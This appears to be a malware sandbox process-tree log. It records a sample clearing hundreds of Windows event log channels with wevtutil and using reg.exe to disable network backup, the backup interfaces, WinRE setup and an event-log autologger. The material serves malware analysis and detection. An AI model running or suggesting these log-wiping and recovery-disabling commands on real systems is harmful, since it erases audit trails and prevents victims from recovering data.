C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
1⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
1⤵
PID:3332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
1⤵
PID:2172

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
1⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
1⤵
PID:1948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
1⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
1⤵
PID:3972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
1⤵
PID:812

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
1⤵
PID:2668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
1⤵
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
1⤵
PID:2576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
1⤵
PID:740

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
1⤵
PID:3524

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
1⤵
PID:4668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
1⤵
- Clears Windows event logs
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
1⤵
PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
1⤵
- Clears Windows event logs
PID:5020

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
1⤵
PID:4856

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
1⤵
- Clears Windows event logs
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
1⤵
PID:5004

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
1⤵
PID:544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
1⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
1⤵
PID:1384

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
1⤵
PID:3996

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
1⤵
PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
1⤵
PID:4128

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
1⤵
PID:1592

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
1⤵
PID:4064

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
1⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
1⤵
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
1⤵
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
1⤵
PID:4472

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
1⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
1⤵
PID:3236

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
1⤵
PID:3244

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
1⤵
PID:4864
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
1⤵
PID:4504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
1⤵
PID:4124

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
1⤵
PID:1728

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
1⤵
PID:1864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
1⤵
PID:3348
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2228

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
1⤵
- Clears Windows event logs
PID:1792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
1⤵
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
1⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
1⤵
PID:3660
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
1⤵
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
1⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
1⤵
- Clears Windows event logs
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
1⤵
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
1⤵
- Clears Windows event logs
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
1⤵
PID:1928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
1⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
1⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
1⤵
PID:844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
1⤵
PID:1936

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
1⤵
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
1⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
1⤵
PID:4648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
1⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
1⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
1⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
1⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
1⤵
PID:3108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
1⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
1⤵
PID:1156

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
1⤵
PID:1948
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
1⤵
PID:4432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
1⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
1⤵
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
1⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
1⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
1⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
1⤵
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
1⤵
PID:1900

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
1⤵
PID:3372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
1⤵
PID:2568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
1⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
1⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
1⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
1⤵
PID:1356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
1⤵
PID:4980

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
1⤵
- Clears Windows event logs
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
1⤵
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
1⤵
PID:3780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
1⤵
PID:1928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
1⤵
- Clears Windows event logs
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
1⤵
PID:3456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
1⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
1⤵
PID:3216

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
1⤵
PID:4268
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
1⤵
PID:4272

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
1⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
1⤵
PID:4088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
1⤵
PID:2172
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
1⤵
PID:1616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
1⤵
PID:748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
1⤵
PID:3972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
1⤵
PID:1604

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
1⤵
PID:3028

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
1⤵
PID:3280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
1⤵
- Clears Windows event logs
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
1⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
1⤵
PID:4432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
1⤵
PID:5068

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
1⤵
- Clears Windows event logs
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
1⤵
PID:2036

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
1⤵
- Clears Windows event logs
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
1⤵
PID:3828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
1⤵
PID:1444

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
1⤵
PID:1308

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
1⤵
PID:4648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
1⤵
PID:4124

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
1⤵
PID:2568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
1⤵
- Clears Windows event logs
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
1⤵
PID:1900

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
1⤵
PID:3372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
1⤵
PID:712

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
1⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
1⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
1⤵
PID:4472

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
